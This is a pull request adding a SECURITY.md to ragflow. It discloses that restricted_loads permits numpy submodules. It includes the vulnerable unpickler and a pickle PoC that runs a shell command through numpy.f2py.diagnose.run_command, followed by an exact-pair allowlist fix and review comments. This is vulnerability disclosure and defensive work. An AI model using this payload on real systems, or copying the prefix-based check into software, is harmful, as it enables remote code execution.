Create SECURITY.md (#1241)
### What problem does this PR solve?
The restricted_loads function at
[api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215)
is still vulnerable, leading to code execution. The main reason is that
the numpy module has a numpy.f2py.diagnose.run_command function that directly
executes commands, but the restricted_loads function allows users to import
functions in the numpy module.
### Additional Details
[https://github.com/infiniflow/ragflow/issues/1240](https://github.com/infiniflow/ragflow/issues/1240)
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
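
The top-level-package rule described above, next to an exact-pair allowlist, as an added example that is not part of this commit or of ragflow's code. The allowlist entries, `AllowlistUnpickler`, `prefix_rule_allows`, `is_rejected` and both sample pickles are assumptions constructed for illustration.

```python
import collections
import importlib
import io
import pickle

# Assumption: illustrative entries, not ragflow's real list of needed globals.
ALLOWED_GLOBALS = frozenset({
    ("collections", "OrderedDict"),
    ("numpy", "dtype"),
    ("numpy", "ndarray"),
})


def prefix_rule_allows(module):
    """The top-level-package rule the report describes, kept for comparison."""
    return module.split(".")[0] in {"numpy", "rag_flow"}


class AllowlistUnpickler(pickle.Unpickler):
    """Resolve only exact (module, name) pairs, never a package prefix."""

    def find_class(self, module, name):
        # Decide before importing: an import runs the module's top-level code.
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(
                "global '%s.%s' is forbidden" % (module, name))
        return getattr(importlib.import_module(module), name)


def restricted_loads(src):
    """Helper analogous to pickle.loads(), using the exact-pair allowlist."""
    return AllowlistUnpickler(io.BytesIO(src)).load()


def is_rejected(src):
    """True when the allowlist refuses a global referenced by the pickle."""
    try:
        restricted_loads(src)
    except pickle.UnpicklingError:
        return True
    return False


# Constructed samples: the first only references the global (no call), so it
# needs no numpy install; the second is an ordinary allowed object.
SUBMODULE_REF = b"cnumpy.f2py.diagnose\nrun_command\n."
BENIGN = pickle.dumps(collections.OrderedDict(a=1))

if __name__ == "__main__":
    print(prefix_rule_allows("numpy.f2py.diagnose"), is_rejected(SUBMODULE_REF))
    print(restricted_loads(BENIGN))
```

The prefix rule accepts the submodule name while the exact-pair check refuses it before any import happens.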
- SECURITY.md +74 -0
|
@@ -0,0 +1,74 @@
| 1 |
+
# Security Policy
|
| 2 |
+
|
| 3 |
+
## Supported Versions
|
| 4 |
+
|
| 5 |
+
Use this section to tell people about which versions of your project are
|
| 6 |
+
currently being supported with security updates.
|
| 7 |
+
|
| 8 |
+
| Version | Supported |
|
| 9 |
+
| ------- | ------------------ |
|
| 10 |
+
| <0.7.0 | :white_check_mark: |
|
| 11 |
+
|
| 12 |
+
## Reporting a Vulnerability
|
| 13 |
+
|
| 14 |
+
### Branch name
|
| 15 |
+
|
| 16 |
+
main
|
| 17 |
+
|
| 18 |
+
### Actual behavior
|
| 19 |
+
|
| 20 |
+
The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
|
| 21 |
+
The main reson is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
### Steps to reproduce
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
**ragflow_patch.py**
|
| 28 |
+
|
| 29 |
+
```py
|
| 30 |
+
import builtins
|
| 31 |
+
import io
|
| 32 |
+
import pickle
|
| 33 |
+
|
| 34 |
+
safe_module = {
|
| 35 |
+
'numpy',
|
| 36 |
+
'rag_flow'
|
| 37 |
+
}
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
class RestrictedUnpickler(pickle.Unpickler):
|
| 41 |
+
def find_class(self, module, name):
|
| 42 |
+
import importlib
|
| 43 |
+
if module.split('.')[0] in safe_module:
|
| 44 |
+
_module = importlib.import_module(module)
|
| 45 |
+
return getattr(_module, name)
|
| 46 |
+
# Forbid everything else.
|
| 47 |
+
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
|
| 48 |
+
(module, name))
|
| 49 |
+
|
| 50 |
+
|
| 51 |
+
def restricted_loads(src):
|
| 52 |
+
"""Helper function analogous to pickle.loads()."""
|
| 53 |
+
return RestrictedUnpickler(io.BytesIO(src)).load()
|
| 54 |
+
```
|
| 55 |
+
Then, **PoC.py**
|
| 56 |
+
```py
|
| 57 |
+
import pickle
|
| 58 |
+
from ragflow_patch import restricted_loads
|
| 59 |
+
class Exploit:
|
| 60 |
+
def __reduce__(self):
|
| 61 |
+
import numpy.f2py.diagnose
|
| 62 |
+
return numpy.f2py.diagnose.run_command, ('whoami', )
|
| 63 |
+
|
| 64 |
+
Payload=pickle.dumps(Exploit())
|
| 65 |
+
restricted_loads(Payload)
|
| 66 |
+
```
|
| 67 |
+
**Result**
|
| 68 |
+

|
| 69 |
+
|
| 70 |
+
|
| 71 |
+
### Additional information
|
| 72 |
+
|
| 73 |
+
#### How to prevent?
|
| 74 |
+
Strictly filter the module and name before calling with getattr function.
|
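Review bot: the "Reporting a Vulnerability" section (added lines 12-74) contains one specific issue report with its PoC instead of telling reporters where and how to submit a report, and "Supported Versions" (lines 5-6) still carries the template placeholder sentence "Use this section to tell people about which versions of your project are currently being supported with security updates." Suggest keeping the restricted_loads write-up in the linked issue and replacing it here with the reporting contact and the process a reporter can expect, and replacing the placeholder with the actual support statement. If the write-up stays, fix "reson" on line 21 and make "How to prevent?" (line 74) concrete: the check on line 43, `module.split('.')[0] in safe_module`, admits every submodule of numpy, so the advice should say to match exact (module, name) pairs against an allowlist before the `importlib.import_module` and `getattr` calls on lines 44-45.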